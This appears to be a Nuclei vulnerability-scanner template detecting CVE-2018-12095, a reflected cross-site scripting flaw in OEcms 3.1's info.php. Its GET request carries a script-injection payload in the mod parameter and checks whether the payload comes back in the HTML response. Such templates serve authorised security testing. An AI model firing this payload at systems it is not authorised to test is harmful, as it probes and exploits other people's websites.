nuclei-templates/cves/2018/CVE-2018-12095.yaml

33 lines
743 B
YAML
Raw Normal View History

2021-08-24 17:29:51 +00:00
id: CVE-2018-12095
info:
name: OEcms 3.1 - Cross-Site Scripting
2021-08-24 19:27:07 +00:00
author: LogicalHunter
2021-08-24 17:29:51 +00:00
severity: medium
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
- https://www.exploit-db.com/exploits/44895
- https://cxsecurity.com/issue/WLB-2018060092
tags: cve,cve2018,xss,OEcms
requests:
- method: GET
path:
- '{{BaseURL}}/cms/info.php?mod=list</script><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200